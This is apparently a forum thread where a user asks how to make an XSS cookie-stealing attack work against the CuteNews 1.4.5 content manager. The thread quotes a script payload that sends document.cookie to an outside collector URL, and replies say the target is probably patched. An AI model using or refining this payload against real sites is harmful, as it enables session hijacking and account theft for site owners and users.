XSS > Cutenews

So I was searching for exploits for cutenews 1.4.5 and came across this one http://securityreason.com/exploitalert/2286. Not sure if i was allowed to post that, if not, i'm sorry.

I decided to try this on a website that i have admin access of. However, when i put markup<script>window.location.href="http://www.site.com/c.ph p?c="+document.cookie+"";</script> into the username, it does nothing.

So i tried making a link with javascript, but when i put in the link cutenews puts it as a filename not an external link, example: www.site.com/www.cookielink.com. I don't think cutenews allows external links in the admin panel :\.

I also tried a redirect, but that never worked either.

Can anyone give me any tips? It would be much appreciated.

Well you lot are about as useless as a dylexic on countdown. ;)

Maybe the site is patched.

Most exploits you find on the web are either patched or outdated, Unless the sites admin are lazy dumbshit's. Be creative and best you read my sig.